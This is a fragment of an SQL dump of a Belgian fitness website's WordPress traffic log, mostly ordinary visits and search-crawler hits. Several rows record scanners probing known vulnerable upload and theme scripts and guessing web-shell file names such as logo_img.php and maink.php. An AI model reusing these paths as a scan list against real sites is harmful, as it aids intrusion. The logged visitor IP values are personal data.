(71544, 1494067064.142448, 3273261686, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71545, 1494067064.622255, 3273261686, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71546, 1494067065.079966, 3273261686, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71547, 1494067065.584446, 3273261686, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71548, 1494067066.107259, 3273261686, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71549, 1494067066.608177, 3273261686, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71550, 1494067067.120334, 3273261686, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71551, 1494067067.610885, 3273261686, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71552, 1494067068.101028, 3273261686, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71553, 1494067414.676310, 2745985804, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/logo_img.php', 'http://www.crosstrainingcenter.be/wp-content/plugins/logo_img.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(71554, 1494068285.785830, 1338304237, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(71555, 1494071162.802224, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71556, 1494071265.051595, 3256644604, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-content/themes/infocus/lib/scripts/dl-skin.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(71557, 1494071502.553004, 1123631302, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71558, 1494071555.392871, 1338304237, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(71559, 1494075433.701945, 3256644604, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/index.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(71560, 1494076485.484888, 1338304237, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(71561, 1494080309.068818, 1370049247, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(71562, 1494080309.685173, 1370049247, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71563, 1494080310.164121, 1370049247, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71564, 1494080310.685614, 1370049247, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71565, 1494080311.196461, 1370049247, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71566, 1494080311.724441, 1370049247, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71567, 1494080312.329089, 1370049247, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71568, 1494080312.846039, 1370049247, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71569, 1494080313.339412, 1370049247, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71570, 1494080313.820025, 1370049247, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71571, 1494080314.296621, 1370049247, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71572, 1494081540.561079, 3256644604, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-content/plugins/the-viddler-wordpress-plugin/js/plupload/examples/upload.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(71573, 1494082928.080851, 2996485381, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(71574, 1494083414.629987, 3256644604, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-content/plugins/ultimate-product-catalogue/product-sheets/wp-classes.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(71575, 1494083639.552260, 1375112542, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(71576, 1494083640.242357, 1375112542, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71577, 1494083640.700107, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71578, 1494083641.142185, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71579, 1494083641.759699, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71580, 1494083642.229546, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71581, 1494083642.826969, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71582, 1494083643.350445, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71583, 1494083643.788974, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71584, 1494083644.261534, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71585, 1494083644.790790, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71586, 1494085117.523157, 1338304237, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(71587, 1494085269.468981, 3256644604, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-content/plugins/sexy-contact-form/includes/fileupload/index.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(71588, 1494088578.419329, 3256644604, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-content/themes/dejavu/lib/scripts/dl-skin.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(71589, 1494092199.633905, 1123631176, 0, 0, 1, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71590, 1494092200.853485, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71591, 1494092201.374698, 1123631302, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71592, 1494092807.977012, 2509959283, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(71593, 1494093218.273933, 3635199342, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-admin/includes/logo_img.php', 'http://crosstrainingcenter.be/wp-admin/includes/logo_img.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(71594, 1494093218.295889, 3635199342, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-admin/css/maink.php', 'http://crosstrainingcenter.be/wp-admin/css/maink.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(71595, 1494093218.316729, 3635199342, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-admin/css/logo_img.php', 'http://crosstrainingcenter.be/wp-admin/css/logo_img.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(71596, 1494093218.333172, 3635199342, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-admin/includes/maink.php', 'http://crosstrainingcenter.be/wp-admin/includes/maink.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(71597, 1494093218.380492, 3635199342, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-admin/images/maink.php', 'http://crosstrainingcenter.be/wp-admin/images/maink.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(71598, 1494093218.408776, 3635199342, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-admin/js/maink.php', 'http://crosstrainingcenter.be/wp-admin/js/maink.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(71599, 1494093218.410487, 3635199342, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-admin/js/logo_img.php', 'http://crosstrainingcenter.be/wp-admin/js/logo_img.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(71600, 1494093242.786148, 3635199342, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/sketch/phpini.php', 'http://crosstrainingcenter.be/wp-content/themes/sketch/phpini.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(71601, 1494093243.572792, 3635199342, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/sketch/info.php', 'http://crosstrainingcenter.be/wp-content/themes/sketch/info.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(71602, 1494093244.039539, 3635199342, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-admin/logo_img.php', 'http://crosstrainingcenter.be/wp-admin/logo_img.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(71603, 1494093244.541096, 3635199342, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/logo_img.php', 'http://crosstrainingcenter.be/wp-content/themes/logo_img.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(71604, 1494093244.808766, 3635199342, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/sketch/system_ml.php', 'http://crosstrainingcenter.be/wp-content/themes/sketch/system_ml.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(71605, 1494093244.884983, 3635199342, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-admin/user/logo_img.php', 'http://crosstrainingcenter.be/wp-admin/user/logo_img.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(71606, 1494093245.023694, 3635199342, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/logo_img.php', 'http://crosstrainingcenter.be/wp-content/logo_img.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(71607, 1494093245.796453, 3635199342, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/logo_img.php', 'http://crosstrainingcenter.be/wp-content/plugins/logo_img.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(71608, 1494093245.850950, 3635199342, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/maink.php', 'http://crosstrainingcenter.be/wp-content/maink.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(71609, 1494093245.860997, 3635199342, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/sketch/nginx2.php', 'http://crosstrainingcenter.be/wp-content/themes/sketch/nginx2.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(71610, 1494093245.871190, 3635199342, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-admin/network/logo_img.php', 'http://crosstrainingcenter.be/wp-admin/network/logo_img.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(71611, 1494093245.873125, 3635199342, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-db-backup-made/system.php', 'http://crosstrainingcenter.be/wp-content/plugins/wp-db-backup-made/system.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(71612, 1494093245.959573, 3635199342, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/logsa.php', 'http://crosstrainingcenter.be/wp-content/plugins/logsa.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(71613, 1494093245.987186, 3635199342, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/sketch/404.php', 'http://crosstrainingcenter.be/wp-content/themes/sketch/404.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(71614, 1494093246.043063, 3635199342, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-admin/maink.php', 'http://crosstrainingcenter.be/wp-admin/maink.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(71615, 1494093263.885031, 3635199342, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/logo_img.php', 'http://crosstrainingcenter.be/wp-content/uploads/logo_img.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(71616, 1494093263.894218, 3635199342, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/zenite/apache-conf.php', 'http://crosstrainingcenter.be/wp-content/themes/zenite/apache-conf.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(71617, 1494093264.126483, 3635199342, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/maink.php', 'http://crosstrainingcenter.be/wp-includes/maink.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(71618, 1494093264.158170, 3635199342, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/css/logo_img.php', 'http://crosstrainingcenter.be/wp-includes/css/logo_img.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(71619, 1494093264.269160, 3635199342, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/js/logo_img.php', 'http://crosstrainingcenter.be/wp-includes/js/logo_img.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(71620, 1494093264.329447, 3635199342, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/sketch/wp-ajax.php', 'http://crosstrainingcenter.be/wp-content/themes/sketch/wp-ajax.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(71621, 1494093264.353487, 3635199342, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/images/maink.php', 'http://crosstrainingcenter.be/wp-includes/images/maink.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(71622, 1494093264.361257, 3635199342, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-includes/images/logo_img.php', 'http://crosstrainingcenter.be/wp-includes/images/logo_img.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(71623, 1494093264.366184, 3635199342, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/upgrade/logo_img.php', 'http://crosstrainingcenter.be/wp-content/upgrade/logo_img.php', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'),
(71624, 1494093852.975852, 2637637395, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(71625, 1494094608.342950, 3112277173, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-includes/pomo/w7388n.php', '', 'Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0'),
(71626, 1494099200.710808, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71627, 1494099716.711869, 2366158866, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(71628, 1494099723.087128, 2366148255, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(71629, 1494101328.742645, 1123631302, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71630, 1494106609.950329, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/les-seances/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71631, 1494108019.160925, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71632, 1494109247.499157, 1123631302, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71633, 1494116070.509198, 2760155412, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/feed/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(71634, 1494116088.702467, 96753435, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(71635, 1494118450.637065, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71636, 1494119371.118206, 1123631302, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71637, 1494125788.031297, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71638, 1494129857.158029, 2509961939, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Linux; Android 6.0; ALE-L21 Build/HuaweiALE-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(71639, 1494129859.174590, 2509961939, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 6.0; ALE-L21 Build/HuaweiALE-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(71640, 1494129863.526554, 2509961939, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 6.0; ALE-L21 Build/HuaweiALE-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(71641, 1494129873.837314, 2509961939, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 6.0; ALE-L21 Build/HuaweiALE-L21) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36'),
(71642, 1494132178.992496, 1123635091, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71643, 1494133715.727317, 1123635091, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Googlebot-Image/1.0'),
(71644, 1494136139.442512, 1123635091, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71645, 1494136558.644891, 2745977448, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)'),
(71646, 1494136562.069391, 2745977448, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)'),
(71647, 1494136577.902105, 2745977448, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)'),
(71648, 1494137171.521085, 676177752, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(71649, 1494142277.821690, 1123635091, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(71650, 1494159120.215161, 1375112542, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(71651, 1494159120.909719, 1375112542, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71652, 1494159121.537416, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71653, 1494159122.284455, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71654, 1494159122.780378, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(71655, 1494159123.501860, 1375112542, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
